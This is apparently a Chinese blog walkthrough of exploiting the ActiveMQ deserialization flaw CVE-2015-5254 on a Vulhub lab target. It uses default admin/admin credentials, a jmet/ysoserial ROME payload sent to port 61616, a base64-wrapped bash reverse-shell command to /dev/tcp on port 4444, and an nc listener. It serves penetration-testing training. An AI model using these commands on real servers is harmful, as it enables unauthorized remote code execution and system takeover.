Vulhub靶机 ActiveMQ 反序列化漏洞(CVE-2015-5254)(渗透测试详解)

一、开启vulhub环境

复制代码
docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本:Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

二、访问靶机IP 8161端口

默认账户密码 admin/admin,登录

此时qucues事件为空

1、使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

复制代码
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,反弹shell
命令(base64加密)}|{base64,-d}|{bash,-i}" -Yp ROME 目标IP 61616

反弹shell命令:echo "bash -i>& /dev/tcp/x.x.x.x/4444 0>&1"> /tmp/shell.sh && bash /tmp/shell.sh

出现此情况,是Java版本过高,根据以下链接更换Java版本

复制代码
https://blog.csdn.net/weixin_46686336/article/details/140635571

切换完成后重新执行命令

出现以上情况就是执行成功

2、返回web页面,刷新

此时就多了一个事件,证明shell已经成功写入

3、攻击机开启nc监听

三、点击事件,成功反弹

至此,成功拿下系统权限。

下期再见,家人们!

相关推荐
恰薯条的屑海鸥6 分钟前
零基础在实践中学习网络安全-皮卡丘靶场(第十四期-XXE模块)
网络·学习·安全·web安全·渗透测试
科技小E8 分钟前
口罩佩戴检测算法AI智能分析网关V4工厂/工业等多场景守护公共卫生安全
网络·人工智能
御承扬17 分钟前
从零开始开发纯血鸿蒙应用之网络检测
网络·华为·harmonyos
搞Linux的杰仔22 分钟前
Ubuntu20.04基础配置安装——系统安装(一)
linux·嵌入式开发
Kaede63 小时前
如何应对Linux云服务器磁盘空间不足的情况
linux·运维·服务器
apocelipes8 小时前
Linux c 运行时获取动态库所在路径
linux·c语言·linux编程
DevSecOps选型指南9 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
努力学习的小廉9 小时前
深入了解linux系统—— 进程池
linux·运维·服务器
恰薯条的屑海鸥9 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
秃头菜狗9 小时前
各个主要目录的功能 / Linux 常见指令
linux·运维·服务器